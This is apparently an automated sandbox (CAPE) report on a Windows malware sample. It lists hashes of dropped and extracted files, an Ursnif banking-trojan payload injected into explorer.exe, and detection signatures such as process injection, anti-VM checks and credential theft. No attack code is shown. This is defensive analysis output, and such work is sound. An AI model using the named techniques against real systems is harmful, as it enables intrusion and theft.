CRC32 D5B31DA6
Ssdeep 3:kkFkl1llltfllXlE/wJlllH1jdClRRly+MlMJA3++oWctQQlvSGKlNLOl5ln:kKY/lHLB7WJAOXWcaQnK+7
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 e04a70c5d802348e5d7e07e65f9f4ec7
SHA1 922c08259cb91eb6b80dea3dad61ef64deb16cd2
SHA256 85b768e3d40787d6fbf54627e007d97c42ddcb0159fcfc753508b7111dfc5e9b
CRC32 3740B3B5
Ssdeep 6:kK9q81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:lq0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 6706253eeac75f7266ef388045bf5e95
SHA1 58b6d5435c1be76fde2d0139b4687197e171b075
SHA256 f55c2b7baf03da971c5af99be4c757a87c2180cecb0f432eb5183eecead5bf6e
CRC32 FFB63CF8
Ssdeep 6:kK281pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:+0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 4652649ebc5156c68c7f1eaf07416a02
SHA1 2fcc378e9991acaf5c69984bccaa87403bc145b0
SHA256 1af17240403860bbed03feaadfbd9cc9749bcda5db2d0acbf10fad2003539b60
CRC32 DF706C55
Ssdeep 6:kKq81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:C0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Type Extracted Shellcode
Size 4096 bytes
Virtual Address 0x003C0000
Process LjejZswGjULF7Ng.exe
PID 420
Path C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
MD5 1019c3ba0f5e5e88fc1cb0bea1c937f2
SHA1 be416d9370c3ab787a8fef33e49f88fc25ff004c
SHA256 8096edd164ee431d520e4877e4f082aa355712d4f4e4337eb7bdc2bdb2937bdd
CRC32 A20A5D4B
Ssdeep 48:ZY+Ml2WkWfbH2lI3FEBoQvrV93I0OHnhQr:1TkylKmBoQvrrmBQ
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 32-bit executable
Size 35328 bytes
Virtual Address 0x00400000
Process LjejZswGjULF7Ng.exe
PID 420
Path C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
MD5 001911709a75fe5dca9c701b879e7123
SHA1 d2d0c26f689a728bedb626ce752574a2a6098035
SHA256 82780285b13630bf203567c6d18c94cccdd0d4bf1ba7642d1fdaa739b4c37113
CRC32 D62D17E7
Ssdeep 384:XCBghXkXDwajDr6MR4IBigtndg7C8goYwlIDfCelhSjlHJBLl+a0t8JzFImi4G71:yxxjTRHBig+dgoYwlGqr1Jn1VwZT
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 32-bit executable
Size 33280 bytes
Virtual Address 0x00400000
Process LjejZswGjULF7Ng.exe
PID 420
Path C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
MD5 f35205840f05fa2c58861b9dd29601b6
SHA1 98066dcfb06de63b65edc568f4ec6795e7f0e706
SHA256 9a9e31d3c83ae11f020cbf145bc2333e8e78d5737d26411639844f79b2bf4585
CRC32 ECF1B79B
Ssdeep 768:wxxjTRHBig+dgoYwlGqr1JnYd4it97iAa5:wxxT5gdTpGqr7n44y9Ja
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
CAPE Yara None matched
Download Download ZIP
Type Ursnif Payload: 64-bit DLL
Size 249856 bytes
Virtual Address 0x0000000006C40000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 3fd0c02fde488b28eeb09ee1d92f459b
SHA1 545c01d116b7ab0b00dc4daa428b8b1984e7caed
SHA256 45d9602ca4dae7095394df0a2b88e3c92704fd1e1b20bb2a93bf2c37c821ba43
CRC32 28C669EB
Ssdeep 6144:bCb3PM7ntLwvLVqLfKyV4bqoJCDQWbjF:bCb3PmntMVqLCPqoJCDQWt
Yara None matched
CAPE Yara
  • Ursnif
  • Ursnif Payload
Download Download ZIP
Type Extracted PE Image: 64-bit DLL
Size 1806848 bytes
Virtual Address 0x000007FEF6DA0000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 b225c11cfae0c76e1ef0bb22e7c37cdc
SHA1 4960748fa61f4e83b8b306c7a8fa2f51a1274198
SHA256 83f66b5faaaa1381be2c07380a2ebe8db3311abaa869d6840f19bc6c77bcf7aa
CRC32 848D3B55
Ssdeep 24576:YUjmNEa/Y8paA4fsFnj1uBT03g1VeSHerSTOw5iBX5zSsHc:YU6NdadgnUB4wPeSHeQtiBpzSs8
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 64-bit DLL
Size 10485775 bytes
Virtual Address 0x000007FEF6120000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 46e1284402392ad063d9b9eb42e960af
SHA1 d438e2a606214f7bad1222cd0aa81d1fa2ad3783
SHA256 6a8b61e38b94f178576d662e8bf66524cde01658d3dd3606f5923cf5b66285e5
CRC32 57AAFAF2
Ssdeep 196608:oYzQajSEXaOrbcub5vcwMU5oC1N1kFIEXYoI65Cuma9JmEa:zzQajSEXaOrbcub5vcwMUOC1rNo55ClN
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 64-bit DLL
Size 10489831 bytes
Virtual Address 0x000007FEF6120000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 84ac2e89002a0852e8db313dcde23834
SHA1 d07ba85b9de919baba6692e9a17b30a78ada8dba
SHA256 f2bd152886215bfe0c39ea2ae5ddd38d52ab7105749cf144a11980ea9bd71931
CRC32 C8A76E49
Ssdeep 196608:oYzQajSEXaOrbcub5vcwMU5oC1N1+FIEXYoI65Cuma9JmEq:zzQajSEXaOrbcub5vcwMUOC1rLo55Clt
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 64-bit DLL
Size 624640 bytes
Virtual Address 0x000007FEF57F0000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 4f6a3aad50ef2578896b3a450a05c33c
SHA1 2f4ed92f706a9ec715a7fa66948bd79fbf7ae2af
SHA256 65a723c6e8bd9a4fb5dd7f337c889fbefff1c3057bbea5770ed48265a5274371
CRC32 63D68719
Ssdeep 12288:SzmDjuFk4LJnqe4qRQhQePCdMgl6kf1TcE+ZokxtjxChq6FVsw:SzmDjuFkuJnqe4qRQhQePCd9l6kf/+Zi
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 64-bit DLL
Size 865280 bytes
Virtual Address 0x000007FEF5580000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 e4a13e5e2a1acd20e64043aca9a5fea5
SHA1 abc527e0c9c2193df9b347c488aaedd5897f919c
SHA256 1c6d2b9d60ffaea027e7041db074cd1bd3afb1b88b47c39e5939d4373970832f
CRC32 F036E9BC
Ssdeep 12288:24XQv1zi6YqutvfXpCOPV4o2To1nSJSkORC:24AxTYt5CW4o2TenSTO
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 64-bit DLL
Size 1275904 bytes
Virtual Address 0x000007FEF4220000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 b1dfe3778b43ab481926643f45cbbff3
SHA1 f98961951a7549a076ccd93a22522193a064f6db
SHA256 4ac9a73f2fe3590f043211c6d0f56088288d0758cf51a719668dfa114cdd30db
CRC32 0D2AAFB0
Ssdeep 12288:vAFzD/feVxzOVABewAV6vv4iT6kALKxNQAMUHHgq2G:6/WHzBcwAVe4E6rLUBF
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 64-bit DLL
Size 1316864 bytes
Virtual Address 0x000007FEF3690000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 eef0e521a042b06259dc3f3322ed238c
SHA1 f3a9976ad5e56c1d6095385e63e5fcc91f4f176b
SHA256 cdcc05faf0f55bd933ad366b58dfe0afce14aec6bffb012b4fecff1e7346e946
CRC32 5276A6BF
Ssdeep 24576:c/dp6BSMhM0gTcwD5LmdRmkD1wVzI5S/Spq5QG1C+5ETfFlTDRoxTDOloZPUH:c/uQ99DqEI5S/Spq5f1C+5ETfFlTmOlo
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 64-bit executable
Size 2861568 bytes
Virtual Address 0x0000000000000000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 33831b9c3cab910dfe1587366259edb1
SHA1 6479c2b08ae62ab2f55e53821c394c33b9240e89
SHA256 5cfd7a048ac8f6f305a5f2fa392c4bb22c76c8ca0fd238311d9f1b9068ea35a6
CRC32 27A507FC
Ssdeep 49152:kxrceI/lIRYraisQhFCUkvvYYYYYYYYYYYRYYYYYYYYYYE3iA7/eFUJN9ojoso2W:GrcPlIW8vYYYYYYYYYYYRYYYYYYYYYY4
Yara None matched
CAPE Yara None matched
Download Download ZIP
Sorry! No process dumps.

Comments



No comments posted

Processing ( 38.538 seconds )

  • 35.599 CAPE
  • 1.69 BehaviorAnalysis
  • 0.628 Dropped
  • 0.222 Static
  • 0.166 TargetInfo
  • 0.095 TrID
  • 0.062 Deduplicate
  • 0.051 NetworkAnalysis
  • 0.019 Strings
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 1.029 seconds )

  • 0.418 antidbg_windows
  • 0.057 decoy_document
  • 0.055 NewtWire Behavior
  • 0.054 api_spamming
  • 0.029 Doppelganging
  • 0.029 antiav_detectreg
  • 0.026 injection_createremotethread
  • 0.025 InjectionCreateRemoteThread
  • 0.023 antivm_vbox_window
  • 0.018 InjectionInterProcess
  • 0.018 antisandbox_script_timer
  • 0.016 injection_runpe
  • 0.016 InjectionProcessHollowing
  • 0.013 antivm_generic_disk
  • 0.012 injection_explorer
  • 0.011 infostealer_ftp
  • 0.01 mimics_filetime
  • 0.01 antivm_generic_scsi
  • 0.01 ransomware_files
  • 0.009 bootkit
  • 0.008 stealth_file
  • 0.008 antiemu_wine_func
  • 0.008 reads_self
  • 0.008 dynamic_function_loading
  • 0.008 virus
  • 0.007 malicious_dynamic_function_loading
  • 0.006 antivm_generic_services
  • 0.006 infostealer_browser_password
  • 0.006 kovter_behavior
  • 0.006 antianalysis_detectreg
  • 0.006 infostealer_im
  • 0.005 hancitor_behavior
  • 0.005 antiav_detectfile
  • 0.005 infostealer_mail
  • 0.005 ransomware_extensions
  • 0.004 exploit_getbasekerneladdress
  • 0.004 infostealer_bitcoin
  • 0.003 antidebug_guardpages
  • 0.003 recon_programs
  • 0.003 exploit_gethaldispatchtable
  • 0.003 persistence_autorun
  • 0.003 antivm_vbox_keys
  • 0.002 lsass_credential_dumping
  • 0.002 antivm_vbox_libs
  • 0.002 infostealer_browser
  • 0.002 EvilGrab
  • 0.002 shifu_behavior
  • 0.002 stealth_timeout
  • 0.002 antianalysis_detectfile
  • 0.002 antivm_vbox_files
  • 0.002 antivm_vmware_keys
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.002 masquerade_process_name
  • 0.001 tinba_behavior
  • 0.001 uac_bypass_eventvwr
  • 0.001 hawkeye_behavior
  • 0.001 sets_autoconfig_url
  • 0.001 rat_nanocore
  • 0.001 antiav_avast_libs
  • 0.001 exploit_heapspray
  • 0.001 stack_pivot
  • 0.001 Vidar Behavior
  • 0.001 betabot_behavior
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 ipc_namedpipe
  • 0.001 kibex_behavior
  • 0.001 exec_crash
  • 0.001 Raccoon Behavior
  • 0.001 cerber_behavior
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vpc_keys
  • 0.001 antivm_xen_keys
  • 0.001 ketrican_regkeys
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway
  • 0.001 recon_fingerprint

Reporting ( 0.018 seconds )

  • 0.018 CompressResults
Task ID 131468
Mongo ID 5e79d82e0986a12c9f6d5f1e
Cuckoo release 1.3-CAPE
Delete